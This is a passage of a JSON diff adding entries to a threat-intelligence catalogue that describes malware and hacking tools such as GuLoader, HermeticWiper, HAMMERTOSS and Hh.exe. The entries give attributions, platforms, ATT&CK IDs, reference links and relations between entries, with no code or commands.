"dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "used-by" + }, + { + "dest-uuid": "60936d3c-37ed-4116-a407-868da3aa4446", + "type": "used-by" + }, + { + "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "type": "similar" + } + ], + "uuid": "5ffe662f-9da1-4b6f-ad3a-f296383e828c", + "value": "gsecdump" + }, + { + "description": "[GuLoader](https://app.tidalcyber.com/software/03e985d6-870b-4533-af13-08b1e0511444) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8), [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), FormBook, and Parallax RAT.[[Unit 42 NETWIRE April 2020](https://app.tidalcyber.com/references/b42f119d-144a-470a-b9fe-ccbf80a78fbb)][[Medium Eli Salem GuLoader April 2021](https://app.tidalcyber.com/references/87c5e84a-b96d-489d-aa10-db95b78c5a93)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0561", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "45c759ac-b490-48bb-80d4-c8eee3431027", + "type": "similar" + } + ], + "uuid": "03e985d6-870b-4533-af13-08b1e0511444", + "value": "GuLoader" + }, + { + "description": "[H1N1](https://app.tidalcyber.com/software/5f1602fe-a4ce-4932-9cf9-ec842f2c58f1) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. [[Cisco H1N1 Part 1](https://app.tidalcyber.com/references/03a2faca-1a47-4f68-9f26-3fa98145f2ab)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0132", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f8dfbc54-b070-4224-b560-79aaa5f835bd", + "type": "similar" + } + ], + "uuid": "5f1602fe-a4ce-4932-9cf9-ec842f2c58f1", + "value": "H1N1" + }, + { + "description": "[Hacking Team UEFI Rootkit](https://app.tidalcyber.com/software/75db2ac3-901e-4b1f-9a0d-bac6562d57a3) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. [[TrendMicro Hacking Team UEFI](https://app.tidalcyber.com/references/24796535-d516-45e9-bcc7-8f03a3f3cd73)]", + "meta": { + "platforms": [], + "software_attack_id": "S0047", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4b62ab58-c23b-4704-9c15-edd568cd59f8", + "type": "similar" + } + ], + "uuid": "75db2ac3-901e-4b1f-9a0d-bac6562d57a3", + "value": "Hacking Team UEFI Rootkit" + }, + { + "description": "[HALFBAKED](https://app.tidalcyber.com/software/5edf0ef7-a960-4500-8a89-8c8b4fdf8824) is a malware family consisting of multiple components intended to establish persistence in victim networks. [[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]", + "meta": { + "platforms": [], + "software_attack_id": "S0151", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "0ced8926-914e-4c78-bc93-356fb90dbd1f", + "type": "similar" + } + ], + "uuid": "5edf0ef7-a960-4500-8a89-8c8b4fdf8824", + "value": "HALFBAKED" + }, + { + "description": "", + "meta": { + "id": "9b32ba80-6dd9-4e6e-9997-e9ad1ec9ef92" + }, + "related": [ + { + "dest-uuid": "cc07f03f-9919-4856-9b30-f4d88940b0ec", + "type": "similar" + } + ], + "uuid": "cd5e2212-64ec-4bf0-a533-6143542c8df5", + "value": "HammerDuke" + }, + { + "description": "", + "meta": { + "id": "d9860d9e-c7dd-440e-ae2e-d8effbc28cf0" + }, + "related": [ + { + "dest-uuid": "cc07f03f-9919-4856-9b30-f4d88940b0ec", + "type": "similar" + } + ], + "uuid": "44c91046-4527-471e-b0d4-a83660594c93", + "value": "NetDuke" + }, + { + "description": "[HAMMERTOSS](https://app.tidalcyber.com/software/cc07f03f-9919-4856-9b30-f4d88940b0ec) is a backdoor that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2015. [[FireEye APT29](https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)] [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0037", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", + "type": "similar" + }, + { + "dest-uuid": "cd5e2212-64ec-4bf0-a533-6143542c8df5", + "type": "similar" + }, + { + "dest-uuid": "44c91046-4527-471e-b0d4-a83660594c93", + "type": "similar" + } + ], + "uuid": "cc07f03f-9919-4856-9b30-f4d88940b0ec", + "value": "HAMMERTOSS" + }, + { + "description": "[[FireEye Hancitor](https://app.tidalcyber.com/references/65a07c8c-5b29-445f-8f01-6e577df4ea62)]", + "meta": { + "id": "16d7bbe3-d369-435d-a696-4a1f1c4e8609" + }, + "related": [ + { + "dest-uuid": "4eee3272-07fa-48ee-a7b9-9dfee3e4550a", + "type": "similar" + } + ], + "uuid": "0616b745-4181-419f-b723-d60034b7c1b5", + "value": "Chanitor" + }, + { + "description": "[Hancitor](https://app.tidalcyber.com/software/4eee3272-07fa-48ee-a7b9-9dfee3e4550a) is a downloader that has been used by [Pony](https://app.tidalcyber.com/software/555b612e-3f0d-421d-b2a7-63eb2d1ece5f) and other information stealing malware.[[Threatpost Hancitor](https://app.tidalcyber.com/references/70ad77af-88aa-4f06-a9cb-df9608157841)][[FireEye Hancitor](https://app.tidalcyber.com/references/65a07c8c-5b29-445f-8f01-6e577df4ea62)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0499", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "ef2247bf-8062-404b-894f-d65d00564817", + "type": "similar" + }, + { + "dest-uuid": "0616b745-4181-419f-b723-d60034b7c1b5", + "type": "similar" + } + ], + "uuid": "4eee3272-07fa-48ee-a7b9-9dfee3e4550a", + "value": "Hancitor" + }, + { + "description": "[HAPPYWORK](https://app.tidalcyber.com/software/c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8) is a downloader used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target South Korean government and financial victims in November 2016. [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [], + "software_attack_id": "S0214", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "211cfe9f-2676-4e1c-a5f5-2c8091da2a68", + "type": "similar" + } + ], + "uuid": "c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8", + "value": "HAPPYWORK" + }, + { + "description": "[HARDRAIN](https://app.tidalcyber.com/software/ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7) is a Trojan malware variant reportedly used by the North Korean government. [[US-CERT HARDRAIN March 2018](https://app.tidalcyber.com/references/ffc17fa5-e7d3-4592-b47b-e12ced0e62a4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0246", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988", + "type": "similar" + } + ], + "uuid": "ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7", + "value": "HARDRAIN" + }, + { + "description": "[Havij](https://app.tidalcyber.com/software/8bd36306-bd4b-4a76-8842-44acb0cedbcc) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. [[Check Point Havij Analysis](https://app.tidalcyber.com/references/2e00a539-acbe-4462-a30f-43da4e8b9c4f)]", + "meta": { + "platforms": [], + "software_attack_id": "S0224", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "used-by" + }, + { + "dest-uuid": "fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "type": "similar" + } + ], + "uuid": "8bd36306-bd4b-4a76-8842-44acb0cedbcc", + "value": "Havij" + }, + { + "description": "[HAWKBALL](https://app.tidalcyber.com/software/392c5a32-53b5-4ce8-a946-226cb533cc4e) is a backdoor that was observed in targeting of the government sector in Central Asia.[[FireEye HAWKBALL Jun 2019](https://app.tidalcyber.com/references/c88150b1-8c0a-4fc5-b5b7-11e242af1c43)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0391", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "12a7450d-b03e-4990-a5b8-b405ab9c803b", + "type": "similar" + } + ], + "uuid": "392c5a32-53b5-4ce8-a946-226cb533cc4e", + "value": "HAWKBALL" + }, + { + "description": "[hcdLoader](https://app.tidalcyber.com/software/a7ffe1bd-45ca-4ca4-94da-3b6c583a868d) is a remote access tool (RAT) that has been used by [APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7). [[Dell Lateral Movement](https://app.tidalcyber.com/references/fcc9b52a-751f-4985-8c32-7aaf411706ad)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0071", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "used-by" + }, + { + "dest-uuid": "9e2bba94-950b-4fcf-8070-cb3f816c5f4e", + "type": "similar" + } + ], + "uuid": "a7ffe1bd-45ca-4ca4-94da-3b6c583a868d", + "value": "hcdLoader" + }, + { + "description": "", + "meta": { + "id": "b347d675-9a6e-4f90-80d5-1574d30a5114" + }, + "related": [ + { + "dest-uuid": "f155b6f9-258d-4446-8867-fe5ee26d8c72", + "type": "similar" + } + ], + "uuid": "69aa0c3f-0b9e-44f5-b1fe-0b155cff0a5f", + "value": "Custom HDoor" + }, + { + "description": "[HDoor](https://app.tidalcyber.com/software/f155b6f9-258d-4446-8867-fe5ee26d8c72) is malware that has been customized and used by the [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) group. [[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0061", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "007b44b6-e4c5-480b-b5b9-56f2081b1b7b", + "type": "similar" + }, + { + "dest-uuid": "69aa0c3f-0b9e-44f5-b1fe-0b155cff0a5f", + "type": "similar" + } + ], + "uuid": "f155b6f9-258d-4446-8867-fe5ee26d8c72", + "value": "HDoor" + }, + { + "description": "[HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) and [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c). [HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0617", + "source": "MITRE", + "tags": [ + "4ac8dcde-2665-4066-9ad9-b5572d5f0d28", + "3535caad-a155-4996-b986-70bc3cd5ce1e", + "f1ad9eba-f4fd-4aec-92c0-833ac14d741b", + "5e7433ad-a894-4489-93bc-41e90da90019", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "5d11d418-95dd-4377-b782-23160dfa17b4", + "type": "similar" + } + ], + "uuid": "813a4ca1-84fe-42dc-89de-5873d028f98d", + "value": "HELLOKITTY" + }, + { + "description": "[Helminth](https://app.tidalcyber.com/software/d6560c81-1e7e-4d01-9814-4be4fb43e655) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. [[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0170", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "eff1a885-6f90-42a1-901f-eef6e7a1905e", + "type": "similar" + } + ], + "uuid": "d6560c81-1e7e-4d01-9814-4be4fb43e655", + "value": "Helminth" + }, + { + "description": "[[Crowdstrike PartyTicket March 2022](https://app.tidalcyber.com/references/8659fea7-7d65-4ee9-8ceb-cf41204b57e0)][[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]", + "meta": { + "id": "0303659d-225e-4f5e-99e2-b9e0caa62b22" + }, + "related": [ + { + "dest-uuid": "f0456f14-4913-4861-b4ad-5e7f3960040e", + "type": "similar" + } + ], + "uuid": "5375e2bd-be8e-4c7b-8173-74ff4f3598b4", + "value": "DriveSlayer" + }, + { + "description": "[[CISA AA22-057A Destructive Malware February 2022](https://app.tidalcyber.com/references/18684085-c156-4610-8b1f-cc9646f2c06e)][[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)]", + "meta": { + "id": "ca36b443-0ec3-445c-a96e-aadf358d82a0" + }, + "related": [ + { + "dest-uuid": "f0456f14-4913-4861-b4ad-5e7f3960040e", + "type": "similar" + } + ], + "uuid": "85c3ad5c-ab5d-47b7-ba05-88daf017f1bd", + "value": "Trojan.Killdisk" + }, + { + "description": "[HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.[[SentinelOne Hermetic Wiper February 2022](https://app.tidalcyber.com/references/96825555-1936-4ee3-bb25-423dc16a9116)][[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)][[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)][[ESET Hermetic Wiper February 2022](https://app.tidalcyber.com/references/07ef66e8-195b-4afe-a518-ce9e77220038)][[Qualys Hermetic Wiper March 2022](https://app.tidalcyber.com/references/2b25969b-2f0b-4204-9277-596e80c4e626)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0697", + "source": "MITRE", + "tags": [ + "2e621fc5-dea4-4cb9-987e-305845986cd3" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a0ab8a96-40c9-4483-8a54-3fafa6d6007a", + "type": "similar" + }, + { + "dest-uuid": "5375e2bd-be8e-4c7b-8173-74ff4f3598b4", + "type": "similar" + }, + { + "dest-uuid": "85c3ad5c-ab5d-47b7-ba05-88daf017f1bd", + "type": "similar" + } + ], + "uuid": "f0456f14-4913-4861-b4ad-5e7f3960040e", + "value": "HermeticWiper" + }, + { + "description": "[HermeticWizard](https://app.tidalcyber.com/software/36ddc8cd-8f80-489e-a702-c682936b5393) is a worm that has been used to spread [HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) in attacks against organizations in Ukraine since at least 2022.[[ESET Hermetic Wizard March 2022](https://app.tidalcyber.com/references/e0337ce9-2ca9-4877-b116-8c4d9d864df0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0698", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa", + "type": "similar" + } + ], + "uuid": "36ddc8cd-8f80-489e-a702-c682936b5393", + "value": "HermeticWizard" + }, + { + "description": "[Heyoka Backdoor](https://app.tidalcyber.com/software/1841a6e8-6c23-46a1-9c81-783746083764) is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) since at least 2013.[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)][[Sourceforge Heyoka 2022](https://app.tidalcyber.com/references/f6677391-cb7a-4abc-abb7-3a8cd47fbc90)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1027", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "454402a3-0503-45bf-b2e0-177fa2e2d412", + "type": "used-by" + }, + { + "dest-uuid": "dff90475-9f72-41a6-84ed-1fbefd3874c0", + "type": "similar" + } + ], + "uuid": "1841a6e8-6c23-46a1-9c81-783746083764", + "value": "Heyoka Backdoor" + }, + { + "description": "[[Hh.exe - LOLBAS Project](/references/4e09bfcf-f5be-46c5-9ebf-8742ac8d1edc)]", + "meta": { + "id": "acbf1a21-fa53-4553-8dba-e99b4051b9e0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5a0d0b83-5a10-425c-98f7-6cb8eb76fda4", + "type": "similar" + } + ], + "uuid": "8e6a3da3-bab4-40d8-b501-b6a986cbf2df", + "value": "Hh.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used for processing chm files in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\hh.exe\n* C:\\Windows\\SysWOW64\\hh.exe\n\n**Resources:**\n* [https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/](https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/)\n\n**Detection:**\n* Sigma: [proc_creation_win_hh_chm_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml)\n* Sigma: [proc_creation_win_hh_html_help_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml)\n* Elastic: [execution_via_compiled_html_file.toml](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml)\n* Elastic: [execution_html_help_executable_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml)\n* Splunk: [detect_html_help_spawn_child_process.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml)\n* Splunk: [detect_html_help_url_in_command_line.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml)[[Hh.exe - LOLBAS Project](/references/4e09bfcf-f5be-46c5-9ebf-8742ac8d1edc)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5114", + "source": "Tidal Cyber", + "tags": [ + "7d028d1e-7a95-47f0-9367-55517f9ef170", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8e6a3da3-bab4-40d8-b501-b6a986cbf2df", + "type": "similar" + } + ], + "uuid": "5a0d0b83-5a10-425c-98f7-6cb8eb76fda4", + "value": "Hh" + }, + { + "description": "[HiddenWasp](https://app.tidalcyber.com/software/ec02fb9c-bf9f-404d-bc54-819f2b3fb040) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.[[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0394", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fc774af4-533b-4724-96d2-ac1026316794", + "type": "similar" + } + ], + "uuid": "ec02fb9c-bf9f-404d-bc54-819f2b3fb040", + "value": "HiddenWasp" + }, + { + "description": "[HIDEDRV](https://app.tidalcyber.com/software/ce1af464-0b14-4fe9-8591-a6fe58aa96c7) is a rootkit used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It has been deployed along with [Downdelph](https://app.tidalcyber.com/software/f7b64b81-f9e7-46bf-8f63-6d7520da832c) to execute and hide that malware. [[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)] [[Sekoia HideDRV Oct 2016](https://app.tidalcyber.com/references/c383811d-c036-4fe7-add8-b4d4f73b3ce4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0135", + "source": "MITRE", + "tags": [ + "1efd43ee-5752-49f2-99fe-e3441f126b00" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4", + "type": "similar" + } + ], + "uuid": "ce1af464-0b14-4fe9-8591-a6fe58aa96c7", + "value": "HIDEDRV" + }, + { + "description": "[Hikit](https://app.tidalcyber.com/software/8046c80c-4339-4cfb-8bfd-464801db2bfe) is malware that has been used by [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) for late-stage persistence and exfiltration after the initial compromise.[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)][[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0009", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "95047f03-4811-4300-922e-1ba937d53a61", + "type": "similar" + } + ], + "uuid": "8046c80c-4339-4cfb-8bfd-464801db2bfe", + "value": "Hikit" + }, + { + "description": "[Hildegard](https://app.tidalcyber.com/software/7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://app.tidalcyber.com/software/7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c). [[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux" + ], + "software_attack_id": "S0601", + "source": "MITRE", + "tags": [ + "4fa6f8e1-b0d5-4169-8038-33e355c08bde", + "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", + "type": "used-by" + }, + { + "dest-uuid": "40a1b8ec-7295-416c-a6b1-68181d86f120", + "type": "similar" + } + ], + "uuid": "7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c", + "value": "Hildegard" + }, + { + "description": "[Hi-Zor](https://app.tidalcyber.com/software/286184d9-f28a-4d5a-a9dd-2216b3c47809) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c). It was used in a campaign named INOCNATION. [[Fidelis Hi-Zor](https://app.tidalcyber.com/references/0c9ff201-283a-4527-8cb8-6f0d05a4f724)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0087", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5967cc93-57c9-404a-8ffd-097edfa7bdfc", + "type": "similar" + } + ], + "uuid": "286184d9-f28a-4d5a-a9dd-2216b3c47809", + "value": "Hi-Zor" + }, + { + "description": "[HOMEFRY](https://app.tidalcyber.com/software/16db13f2-f350-4323-96cb-c5f4ac36c3e0) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) backdoors. [[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0232", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "7451bcf9-e6e6-4a70-bc3d-1599173d0035", + "type": "similar" + } + ], + "uuid": "16db13f2-f350-4323-96cb-c5f4ac36c3e0", + "value": "HOMEFRY" + }, + { + "description": "[HOPLIGHT](https://app.tidalcyber.com/software/4d94594c-2224-46ca-8bc3-28b12ed139f9) is a backdoor Trojan that has reportedly been used by the North Korean government.[[US-CERT HOPLIGHT Apr 2019](https://app.tidalcyber.com/references/e722b71b-9042-4143-a156-489783d86e0a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0376", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "454fe82d-6fd2-4ac6-91ab-28a33fe01369", + "type": "similar" + } + ], + "uuid": "4d94594c-2224-46ca-8bc3-28b12ed139f9", + "value": "HOPLIGHT" + }, + { + "description": "[HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.[[US-CERT HOTCROISSANT February 2020](https://app.tidalcyber.com/references/db5c816a-2a23-4966-8f0b-4ec86cae45c9)] [HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe) shares numerous code similarities with [Rifdoor](https://app.tidalcyber.com/software/ca5ae7c8-467a-4434-82fc-db50ce3fc671).[[Carbon Black HotCroissant April 2020](https://app.tidalcyber.com/references/43bcb35b-56e1-47a8-9c74-f7543a25b2a6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0431", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "aad11e34-02ca-4220-91cd-2ed420af4db3", + "type": "similar" + } + ], + "uuid": "a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe", + "value": "HotCroissant" + }, + { + "description": "[[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)]", + "meta": { + "id": "12a85307-c7c4-4388-978e-a32b47544c2e" + }, + "related": [ + { + "dest-uuid": "b98d9fe7-9aa3-409a-bf5c-eadb01bac948", + "type": "similar" + } + ], + "uuid": 